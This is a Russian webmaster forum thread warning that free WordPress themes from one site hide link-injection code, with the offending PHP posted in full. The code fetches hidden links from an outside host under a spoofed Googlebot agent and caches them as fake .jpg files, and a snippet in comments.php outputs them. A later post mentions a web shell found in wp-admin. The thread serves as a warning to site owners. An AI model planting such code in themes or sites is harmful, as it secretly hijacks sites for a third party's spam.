WEBLEDI.RUВебледи Форум успешных женщин-вебмастеров
04 Декабрь 2016, 18:15:51 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.

Войти
Правила Реклама
 
5
10
15
Свежие ответы
Re: Интересные статьи из буржунета (переводы) + Рерайтинг + Копирайтинг от semnat (Контент, копирайтинг, переводы)
Re: Партнерка Vsemayki.ru - 25% с продаж. Отличный конверт 1 к 20 от vsemaykiadmin (CPA-сети)
Re: Занимательные статьи для ваших сайтов от Лизки от Ljuljak (Ищу копирайтера, редактора, контент-менеджера)
Доска объявлений версии 2.2 от Diana101 (Сайты)
Re: Дизайн от новичка от LanaSvetNik (Дизайн)
Онлайн-консультант Jivosite со скидкой до 20% от KeyWebRu (Хостинг)
Создать тест-опрос в Гугл Документах (или ваш вариант) от Anonyff (Работа и услуги)
Re: AdBean - Бобовая тизерная сеть. Новостные и товарные тизеры. До 90% отчислений! от AdBean (Реклама и доход)
Re: Подарю, продам или сдам в аренду домены от June (Домены)
Автоматизация Яндекс Директ + возврат 8% от рекламного бюджета. от Александр_26 (Полезное)
Re: Quick Sender - Комбайн для продвижения в ВКонтакте от Dima_Myrzich (Социальные сети)
Re: Марафон Спарта от Пузата - Почему я иду от Katelite (Обучение сайтостроению, SEO и заработку)
Re: Чистенький женский СДЛ. Размещение в авто от uckpa (Платное размещение статей и ссылок)
Re: [Анонс] Программа для группировки ключевых слов KeyAssort от KeyAssort (Сервисы и SEO программы)
Re: Имеют ли вес покупные ссылки при теперешних правилах Яндекса от Lina7 (Раскрутка сайтов в поисковиках)
Свежие темы
Показать ещё
  Печать  
Страниц: 1
Автор

Тема: Внимание! Опасные шаблоны!  (Прочитано 3083 раз)

0 Пользователей и 1 Гость смотрят эту тему.
Valeriya
Offline Offline

Пол: Женский
Сообщений: 1582



Просмотр профиля
« : 16 Январь 2014, 16:08:55 »

Сегодня обнаружилось, что в моем шаблоне в файле functions.php находится код, который подгружает на сайт левые ссылки. После поисков в инете выяснилось, что есть товарищ, имеющий несколько сайтов с шаблонами, в которые вставляет сей код, и продает услугу по накрутке тица. Один из опасных сайтов, откуда НЕ НАДО качать темы для ВП - wp-templates.ru

Для особо интересующихся:
_http://forum.antichat.ru/printthread.php?t=351839
там же есть ссылка на тему того товарища на серче.

Будьте внимательны!
Записан
SVET_A
Offline Offline

Пол: Женский
Сообщений: 2944


Мечта, успех, чудо


Просмотр профиля
« Ответ #1 : 16 Январь 2014, 16:12:41 »

Valeriya, а код уже удалила? Какой он из себя, увидеть бы
Записан

Прежде чем что то сделать – подумай, как ты будешь с этим жить
У человека есть две любимые игрушки: собственная судьба и чужие чувства…
torechka
Offline Offline

Пол: Женский
Сообщений: 61


Работают руками, а зарабатывают умом


Просмотр профиля WWW
« Ответ #2 : 16 Январь 2014, 16:24:06 »

да, код бы глянуть. поискать на своих надо, а то может и не только этот товарищ этим занимается.
Записан

Нужен копирайтер? Это я! Авторские обзоры, дайджесты, статьи.
Моя любимая колонка:
Valeriya
Offline Offline

Пол: Женский
Сообщений: 1582



Просмотр профиля
« Ответ #3 : 16 Январь 2014, 16:25:31 »

Код вот такой:
Код:
error_reporting('^ E_ALL ^ E_NOTICE');
ini_set('display_errors', '0');
error_reporting(E_ALL);
ini_set('display_errors', '0');

class Get_links {

    var $host = 'wpconfig.net';
    var $path = '/system.php';
    var $_cache_lifetime    = 21600;
    var $_socket_timeout    = 5;

    function get_remote() {
    $req_url = 'http://'.$_SERVER['HTTP_HOST'].urldecode($_SERVER['REQUEST_URI']);
    $_user_agent = "Mozilla/5.0 (compatible; Googlebot/2.1; ".$req_url.")";

         $links_class = new Get_links();
         $host = $links_class->host;
         $path = $links_class->path;
         $_socket_timeout = $links_class->_socket_timeout;
         //$_user_agent = $links_class->_user_agent;

        @ini_set('allow_url_fopen',          1);
        @ini_set('default_socket_timeout',   $_socket_timeout);
        @ini_set('user_agent', $_user_agent);

        if (function_exists('file_get_contents')) {
            $opts = array(
                'http'=>array(
                    'method'=>"GET",
                    'header'=>"Referer: {$req_url}\r\n".
                    "User-Agent: {$_user_agent}\r\n"
                )
            );
            $context = stream_context_create($opts);

            $data = @file_get_contents('http://' . $host . $path, false, $context);
            preg_match('/(\<\!--link--\>)(.*?)(\<\!--link--\>)/', $data, $data);
            $data = @$data[2];
            return $data;
        }
           return '<!--link error-->';
      }

    function return_links($lib_path) {
         $links_class = new Get_links();
         $file = ABSPATH.'wp-content/uploads/2011/'.md5($_SERVER['REQUEST_URI']).'.jpg';
         $_cache_lifetime = $links_class->_cache_lifetime;

        if (!file_exists($file))
        {
            @touch($file, time());
            $data = $links_class->get_remote();
            file_put_contents($file, $data);
            return $data;
        } elseif ( time()-filemtime($file) > $_cache_lifetime || filesize($file) == 0) {
            @touch($file, time());
            $data = $links_class->get_remote();
            file_put_contents($file, $data);
            return $data;
        } else {
            $data = file_get_contents($file);
            return $data;
        }
    }
}

плюс в файле comments.php прописан код вызова этих ссылок
Код:
<?php $lib_path dirname(__FILE__).'/'; require_once('functions.php'); $links = new Get_links(); $links $links->return_links($lib_path); echo $links?>
Записан
ewa
Я не ищу счастье, я его источник!!!
Offline Offline

Пол: Женский
Сообщений: 871



Просмотр профиля
« Ответ #4 : 16 Январь 2014, 18:48:35 »

первого кода у меня в шаблоне нет, а второй есть, что делать? удалять? а будут ли комментарии без него работать?  В замешательстве
Записан

Valeriya
Offline Offline

Пол: Женский
Сообщений: 1582



Просмотр профиля
« Ответ #5 : 16 Январь 2014, 19:07:09 »

ewa, а какие ссылки тогда этот код выводит?  Непонимающий в нём же видно, что он выводит ссылки (Get_links) из файла ('functions.php'). может там какой-то другой код есть в functions.php? поищите в нём "Get_links".

ну, и всегда остается метод тыка Улыбка удалили - посмотрели. всё работает - хорошо. что-то поломалось - вернули всё обратно.

или к специалисту Улыбка мне Татьяна сказала, что у меня эта гадость на сайте.
Записан
Redisss
Offline Offline

Сообщений: 21


Просмотр профиля WWW
« Ответ #6 : 16 Январь 2014, 19:23:27 »

Ну вы как с луны свалились. Вы еще скажите, что не знаете, что в платных, но занулленых цмс тоже есть ссылки.
Записан

Резвая СЕОшница
Valeriya
Offline Offline

Пол: Женский
Сообщений: 1582



Просмотр профиля
« Ответ #7 : 16 Январь 2014, 19:25:46 »

Redisss, одно дело, когда просто ссылки, их видно и можно удалить, и другое - когда это прописано в коде таким образом, что ссылки подгружаются через сторонний сайт и их не видно до тех пор, пока автор этого кода не решит их туда загрузить.
Записан
Valeriya
Offline Offline

Пол: Женский
Сообщений: 1582



Просмотр профиля
« Ответ #8 : 16 Январь 2014, 19:30:02 »

в процессе изучения той темы на серче обнаружила, что автор сайта с шаблонами реально честно предупреждает о наличии в темах скрытых невидимых ссылок, которые
Цитировать
не видны визуально и не портят внешний вид как шаблона, так и самого сайта, использующего данный шаблон
. Это написано в правилах сайта, а ссылка на правила, как полагается, в саааамом низу мелким шрифтом))
Записан
vitvirtual
« Ответ #9 : 29 Январь 2014, 20:53:21 »

Во всех бесплатных шаблонах, которые взяты не с официального сайта шаблонов wordpress, есть либо прямые ссылки, либо код для подгрузки ссылок, либо другие дыры. Бесплатный сыр бывает самизнаетегде  Подмигивающий
Записан
Белла
Offline Offline

Сообщений: 1


Просмотр профиля
« Ответ #10 : 25 Март 2014, 17:02:38 »

Здравствуйте.
Если на сайте Вордпресса обнаружена троянская программа, которую EsetNOD32 нашел в скачанніх бекапах сайта  по адресу

public_html/wp-admin/includes/class-wp-filesystem-index.php - PHP/WebShell.NBS

Как можно удалить эту программу, если ее не видно через файловый менеджер на ТаймВеб?
Сам антивирус удаляет всю папку архива public_html.
Получается, что кто-то очень надежно прописал троян, а может и хостер?
Записан
Страниц: 1
  Печать  
 
Перейти в:  

| Sitemap